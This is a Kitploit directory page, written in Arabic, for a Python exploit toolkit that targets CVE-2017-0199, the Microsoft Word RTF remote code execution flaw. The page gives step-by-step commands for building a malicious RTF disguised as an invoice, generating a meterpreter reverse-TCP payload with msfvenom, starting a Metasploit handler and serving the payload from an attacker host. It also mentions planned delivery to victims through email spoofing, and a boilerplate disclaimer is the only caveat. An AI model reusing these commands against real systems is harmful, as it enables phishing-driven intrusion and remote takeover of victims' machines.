Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-0199 — أداة Exploit toolkit CVE-2017-0199 - v2.0 هي سكربت بايثون مفيد يوفر طريقة سريعة وفعالة لاستغلال ثغرة Microsoft RTF RCE. يمكنها توليد ملف RTF خبيث وتسليم حمولة metasploit / meterpreter / أو أي حمولة أخرى إلى الضحية دون أي إعداد معقد. | Kitploit
أدوات/GitHubGitHub/exploit-install/cve-2017-0199
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubexploit-install/cve-2017-0199

CVE-2017-0199

أداة Exploit toolkit CVE-2017-0199 - v2.0 هي سكربت بايثون مفيد يوفر طريقة سريعة وفعالة لاستغلال ثغرة Microsoft RTF RCE. يمكنها توليد ملف RTF خبيث وتسليم حمولة metasploit / meterpreter / أو أي حمولة أخرى إلى الضحية دون أي إعداد معقد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
79منذ 9 سنواتلم تتم المراجعة بعد

مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 2.0

مجموعة أدوات الاستغلال CVE-2017-0199 - الإصدار 2.0 هي سكربت بايثون عملي يوفر طريقة سريعة وفعالة لاستغلال ثغرة تنفيذ الأوامر البرمجية عن بُعد (RCE) في Microsoft RTF. يمكنها توليد ملف RTF خبيث وتسليم حمولة metasploit / meterpreter إلى الضحية دون أي إعدادات معقدة.

فيديو تعليمي

https://youtu.be/42LjG7bAvpg

ملاحظات الإصدار:

أضاف هذا الإصدار الإمكانيات التالية إلى السكربت

root@kitploit:~
- توليد ملف RTF خبيث باستخدام المجموعة
- تشغيل المجموعة في وضع الاستغلال كخادم HTA مصغر + خادم ويب

الإصدار: بايثون 2.7.13

الإصدار القادم:

جارٍ العمل على الميزة التالية

root@kitploit:~
- إرسال ملف RTF الخبيث المُولَّد تلقائيًا إلى الضحية باستخدام انتحال البريد الإلكتروني

مثال:

  • الخطوة 1: توليد ملف RTF خبيث باستخدام الأمر التالي وإرساله إلى الضحية

    root@kitploit:~
      Syntax:
    
      # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    
      Example:
    
      # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
    
  • الخطوة 2 (اختيارية، إذا كنت تستخدم حمولة MSF): توليد حمولة metasploit وبدء المُعالج (handler)

    root@kitploit:~
      Example:
    
      Generate Payload:
    
      # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    
      Start Handler:
    
      # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
    
  • الخطوة 3: تشغيل المجموعة في وضع الاستغلال لتسليم الحمولات

    root@kitploit:~
      Syntax:
    
      # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    
      Example:
    
      # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
    

وسائط سطر الأوامر:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)

Modes:

-M gen                                          Generate Malicious RTF file only

     Generate malicious RTF file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.

                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and

                                             will be requested once victim will open malicious RTF file.
-M exp                                          Start exploitation mode

     Exploitation:

      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

إخلاء مسؤولية

هذا البرنامج مخصص للأغراض التعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء الاستخدام لهذه البرامج أو أي مشتقات منها. باستخدامك لهذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.

شكر وتقدير

@nixawk لتوفير عينة RTF، @bhdresh

الأخطاء والمشكلات وطلبات الميزات

من الواضح أنني لست مطورًا بدوام كامل، لذا توقع بعض الأخطاء

يرجى الإبلاغ عن الأخطاء والمشكلات إلى [email protected]

تنزيل الأداة